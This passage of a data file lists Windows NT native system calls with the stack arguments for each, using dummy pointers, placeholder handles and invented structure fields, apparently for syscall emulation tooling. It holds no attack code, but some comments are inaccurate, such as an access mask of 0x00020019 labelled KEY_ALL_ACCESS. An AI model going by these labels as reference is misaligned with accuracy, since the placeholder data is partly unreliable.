"structureValueExpectations": None, "pointedValue": "0x01" }, { "value": "0xbadd00b0", "additionalComment": "Pointer to ULONG Unknown (dummy pointer, will receive unknown value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd00c0", "additionalComment": "Pointer to UNICODE_STRING Policy (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct106", "structureValueExpectations": "UNICODE_STRING describing the policy name.", "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "Pointer to UNICODE_STRING SubCategory (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct107", "structureValueExpectations": "UNICODE_STRING describing the subcategory.", "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to UNICODE_STRING Category (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct108", "structureValueExpectations": "UNICODE_STRING describing the category.", "pointedValue": None } ], "structures": { "struct106": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x000c", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0130", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct107": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0008", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0140", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] }, "struct108": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x000a", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0150", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtQueryWnfStateNameInformation": { "ntFunc": "NtQueryWnfStateNameInformation", "pushes": [ { "value": "0x00001000", "additionalComment": "ULONG InfoBufferSize (typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to InfoBuffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "PVOID ExplicitScope (None, typical usage)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG NameInfoClass (WnfStateNameInfoBasic, typical usage)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xa3bcdef0", "additionalComment": "PCWNF_STATE_NAME StateName (example state name value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRenameKey": { "ntFunc": "NtRenameKey", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to UNICODE_STRING ReplacementName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct109", "structureValueExpectations": "UNICODE_STRING structure describing the new key name.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct109": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0020", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtResumeProcess": { "ntFunc": "NtResumeProcess", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE hProcess (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRevertContainerImpersonation": { "ntFunc": "NtRevertContainerImpersonation", "pushes": [], "structures": {} }, "NtRollbackRegistryTransaction": { "ntFunc": "NtRollbackRegistryTransaction", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOL Wait (TRUE, wait for rollback to complete)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE RegistryHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSaveKeyEx": { "ntFunc": "NtSaveKeyEx", "pushes": [ { "value": "0x00000000", "additionalComment": "Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000DEAD", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000BEEF", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSaveMergedKeys": { "ntFunc": "NtSaveMergedKeys", "pushes": [ { "value": "0x0000DEAD", "additionalComment": "HANDLE FileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000BEEF", "additionalComment": "HANDLE LowPrecedenceKeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000FEED", "additionalComment": "HANDLE HighPrecedenceKeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSecureConnectPort": { "ntFunc": "NtSecureConnectPort", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ConnectDataLength (dummy pointer, commonly None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "PVOID ConnectData (None, no connect data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG MaxMsgLength (dummy pointer, commonly None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00001000" }, { "value": "0x00000000", "additionalComment": "PREMOTE_PORT_VIEW pSectionMapInfo (None, optional)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PSID SecurityInfo (None, optional)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PPORT_VIEW pSectionInfo (None, optional)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG QOS (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to UNICODE_STRING Name (dummy pointer, commonly non-None)", "structurePointer": "UNICODE_STRING", "structureRef": "struct110", "structureValueExpectations": "UNICODE_STRING structure describing the port name.", "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE PortHandle (dummy pointer, output)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct110": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0040", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0060", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtSetBootOptions": { "ntFunc": "NtSetBootOptions", "pushes": [ { "value": "0x00000020", "additionalComment": "ULONG BufferLength (example: 32 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "PVOID Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtSetCachedSigningLevel": { "ntFunc": "NtSetCachedSigningLevel", "pushes": [ { "value": "0x0000DEAD", "additionalComment": "HANDLE TargetFile (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ULONG SourceFileCount (example: 2 files)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to HANDLE SourceFiles (dummy pointer to array)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x0000BEEF" }, { "value": "0x00000006", "additionalComment": "BYTE InputSigningLevel (example: 6, SIGNING_LEVEL_ANTIMALWARE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG Flags (example: 1, e.g., CACHE_SIGNING_LEVEL_FLAG_USE_FOR_PROCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetCachedSigningLevel2": { "ntFunc": "NtSetCachedSigningLevel2", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to LevelInformation (dummy pointer, typically a structure or buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": "Buffer or structure describing signing level information.", "pointedValue": "0xbadd1000" }, { "value": "0x00000444", "additionalComment": "HANDLE TargetFile (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "SourceFileCount (example: 2 source files)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to array of source file handles (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": "Pointer to array of handles to source files.", "pointedValue": "0x00000555" }, { "value": "0x03", "additionalComment": "InputSigningLevel (example: SIGNING_LEVEL_3)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "Flags (example: 1, e.g., CACHE_SIGNING_LEVEL_FLAG_USE_FOR_PROCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetContextThread": { "ntFunc": "NtSetContextThread", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to CONTEXT structure (dummy pointer)", "structurePointer": "CONTEXT", "structureRef": "struct111", "structureValueExpectations": "Thread context structure (registers, flags, etc.)", "pointedValue": None }, { "value": "0x00000666", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct111": { "type": "CONTEXT", "fields": [ { "fieldName": "ContextFlags", "fieldType": "ULONG", "fieldValue": "0x00010007", "fieldComment": "CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS" }, { "fieldName": "Eip", "fieldType": "ULONG", "fieldValue": "0x00401000", "fieldComment": "Instruction pointer" }, { "fieldName": "Esp", "fieldType": "ULONG", "fieldValue": "0x0012FFB0", "fieldComment": "Stack pointer" }, { "fieldName": "Eax", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "General purpose register" } ] } } }, "NtSetDebugFilterState": { "ntFunc": "NtSetDebugFilterState", "pushes": [ { "value": "0x01", "additionalComment": "State (TRUE, enable filter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "Level (example: 2, moderate verbosity)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000000A", "additionalComment": "Component (example: 10, arbitrary component ID)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetDefaultUILanguage": { "ntFunc": "NtSetDefaultUILanguage", "pushes": [ { "value": "0x00000409", "additionalComment": "LanguageId (en-US, 0x409)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetIRTimer": { "ntFunc": "NtSetIRTimer", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to LARGE_INTEGER Time (dummy pointer)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct112", "structureValueExpectations": "Absolute or relative time value.", "pointedValue": None }, { "value": "0x00000777", "additionalComment": "HANDLE TimerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct112": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x00000001DCD65000", "fieldComment": "Example: 2 seconds in 100-nanosecond intervals" } ] } } }, "NtSetInformationDebugObject": { "ntFunc": "NtSetInformationDebugObject", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer, optional, often None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000008", "additionalComment": "Length of Buffer (8 bytes, typical for small info classes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to Buffer (dummy pointer, typically to a structure or data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000001", "additionalComment": "DEBUGOBJECTINFOCLASS Class (DebugObjectFlagsInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE DebugHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationSymbolicLink": { "ntFunc": "NtSetInformationSymbolicLink", "pushes": [ { "value": "0x00000010", "additionalComment": "BufferLength (16 bytes, typical for a small structure or string)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to Buffer (dummy pointer, e.g., to a structure or data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000001", "additionalComment": "Class (SymbolicLinkGlobalInformation, typical value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE Handle (dummy handle to symbolic link object)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetLdtEntries": { "ntFunc": "NtSetLdtEntries", "pushes": [ { "value": "0x0000FFFF", "additionalComment": "ULONG LdtEntry2H (typical high word for LDT entry)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000F000", "additionalComment": "ULONG LdtEntry2L (typical low word for LDT entry)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000020", "additionalComment": "ULONG Selector2 (selector index, e.g., 0x20)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000AAAA", "additionalComment": "ULONG LdtEntry1H (typical high word for LDT entry)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000A000", "additionalComment": "ULONG LdtEntry1L (typical low word for LDT entry)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000018", "additionalComment": "ULONG Selector1 (selector index, e.g., 0x18)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetSystemEnvironmentValueEx": { "ntFunc": "NtSetSystemEnvironmentValueEx", "pushes": [ { "value": "0x00000001", "additionalComment": "Attributes (EFI_VARIABLE_NON_VOLATILE, typical for UEFI variables)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000008", "additionalComment": "BufferLength (8 bytes, typical for a small value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to Buffer (dummy pointer, e.g., to value data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x12345678" }, { "value": "0xbadd0040", "additionalComment": "Pointer to GUID (dummy pointer, typically to a GUID structure)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xA1B2C3D4" }, { "value": "0xbadd0050", "additionalComment": "Pointer to UNICODE_STRING Name (dummy pointer, typically to variable name)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0060" } ], "structures": {} }, "NtSetSystemPowerState": { "ntFunc": "NtSetSystemPowerState", "pushes": [ { "value": "0x00000001", "additionalComment": "Flags (POWER_ACTION_OVERRIDE_APPS, typical flag)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "SYSTEM_POWER_STATE State (PowerSystemSleeping1, e.g., sleep)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000003", "additionalComment": "POWER_ACTION Action (PowerActionSleep, typical action)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetThreadExecutionState": { "ntFunc": "NtSetThreadExecutionState", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG PreviousState (dummy pointer, optional, often None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x80000000", "additionalComment": "ULONG State (ES_SYSTEM_REQUIRED | ES_CONTINUOUS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetUuidSeed": { "ntFunc": "NtSetUuidSeed", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to UCHAR UuidSeed (dummy pointer, typically 16 bytes for UUID seed)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00112233" } ], "structures": {} }, "NtSubscribeWnfStateChange": { "ntFunc": "NtSubscribeWnfStateChange", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG (dummy pointer, optional, often None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "ULONG EventMask (example: 1 for basic event mask)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000010", "additionalComment": "ULONG ChangeStamp (example: 0x10 for a plausible change stamp)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x41C64E6D", "additionalComment": "PCWNF_STATE_NAME StateName (example: plausible state name value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSuspendProcess": { "ntFunc": "NtSuspendProcess", "pushes": [ { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtTranslateFilePath": { "ntFunc": "NtTranslateFilePath", "pushes": [ { "value": "0x00000100", "additionalComment": "ULONG OutputFilePathLength (256 bytes, typical buffer size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to output file path buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "ULONG OutputType (example: 1 for FILE_PATH_TYPE_WIN32)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to input file path buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtUnloadKey2": { "ntFunc": "NtUnloadKey2", "pushes": [ { "value": "0x00000000", "additionalComment": "Flags (default: 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES TargetKey (None, typical for default/unpopulated)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None } ], "structures": {} }, "NtUnloadKeyEx": { "ntFunc": "NtUnloadKeyEx", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE Event (None, no event signaled on completion)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "POBJECT_ATTRIBUTES TargetKey (None, typical for default/unpopulated)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": None, "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None } ], "structures": {} }, "NtUnsubscribeWnfStateChange": { "ntFunc": "NtUnsubscribeWnfStateChange", "pushes": [ { "value": "0x00000000", "additionalComment": "PCWNF_STATE_NAME StateName (None, no state name specified)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtVdmControl": { "ntFunc": "NtVdmControl", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID ControlData (None, no control data provided)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG ControlCode (default: 0, e.g., VdmStartExecution)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWaitForAlertByThreadId": { "ntFunc": "NtWaitForAlertByThreadId", "pushes": [ { "value": "0x00000000", "additionalComment": "PLARGE_INTEGER Time_Out (None, wait indefinitely)", "structurePointer": "LARGE_INTEGER", "structureRef": None, "structureValueExpectations": "Timeout interval as a relative or absolute time value.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE Handle (None, current thread)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWaitForDebugEvent": { "ntFunc": "NtWaitForDebugEvent", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG Result (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0xbadd0010", "additionalComment": "Pointer to LARGE_INTEGER Time_Out (dummy pointer, None for infinite wait)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct113", "structureValueExpectations": "Timeout interval in 100-nanosecond units, or None for infinite.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN Alertable (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE DebugHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct113": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "None for infinite wait" } ] } } }, "NtLoadKey3": { "ntFunc": "NtLoadKey3", "pushes": [ { "value": "0x00000001", "additionalComment": "ULONG Unknown (example nonzero value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE KeyHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00020019", "additionalComment": "ACCESS_MASK DesiredAccess (KEY_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "ULONG LoadArgumentCount (example: 2 arguments)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to LoadArguments (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000000", "additionalComment": "ULONG Flags (default 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to OBJECT_ATTRIBUTES FileObjectAttributes (dummy pointer, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct114", "structureValueExpectations": "File object attributes, commonly None.", "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to OBJECT_ATTRIBUTES KeyObjectAttributes (dummy pointer, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct115", "structureValueExpectations": "Key object attributes, commonly None.", "pointedValue": None } ], "structures": { "struct114": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No attributes" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] }, "struct115": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "No attributes" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtAlpcConnectPort": { "ntFunc": "NtAlpcConnectPort", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to LARGE_INTEGER Time_Out (dummy pointer, commonly None)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct116", "structureValueExpectations": "Timeout interval in 100-nanosecond units, or None for infinite.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to ALPC_MESSAGE_ATTRIBUTES __INMessageAttributes (dummy pointer, commonly None)", "structurePointer": "ALPC_MESSAGE_ATTRIBUTES", "structureRef": "struct117", "structureValueExpectations": "Input message attributes, commonly None.", "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to ALPC_MESSAGE_ATTRIBUTES __OUTMessageAttributes (dummy pointer, commonly None)", "structurePointer": "ALPC_MESSAGE_ATTRIBUTES", "structureRef": "struct118", "structureValueExpectations": "Output message attributes, commonly None.", "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to ULONG BufferLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000400" }, { "value": "0xbadd0090", "additionalComment": "Pointer to PORT_MESSAGE ConnectionMessage (dummy pointer)", "structurePointer": "PORT_MESSAGE", "structureRef": "struct119", "structureValueExpectations": "Connection message structure.", "pointedValue": None }, { "value": "0xbadd00a0", "additionalComment": "Pointer to SID RequiredServerSid (dummy pointer, commonly None)", "structurePointer": "SID", "structureRef": "struct120", "structureValueExpectations": "Required server SID, commonly None.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG Flags (example: ALPC_CONNECTFLAG_SYNC_CONNECTION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00b0", "additionalComment": "Pointer to ALPC_PORT_ATTRIBUTES PortAttributes (dummy pointer)", "structurePointer": "ALPC_PORT_ATTRIBUTES", "structureRef": "struct121", "structureValueExpectations": "Port attributes structure.", "pointedValue": None }, { "value": "0xbadd00c0", "additionalComment": "Pointer to OBJECT_ATTRIBUTES ObjectAttributes (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct122", "structureValueExpectations": "Object attributes for the port.", "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "Pointer to UNICODE_STRING PortName (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct123", "structureValueExpectations": "Name of the ALPC port.", "pointedValue": None }, { "value": "0xbadd00e0", "additionalComment": "Pointer to HANDLE PortHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct116": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "None for infinite wait" } ] }, "struct117": { "type": "ALPC_MESSAGE_ATTRIBUTES", "fields": [ { "fieldName": "AllocatedAttributes", "fieldType": "ULONG", 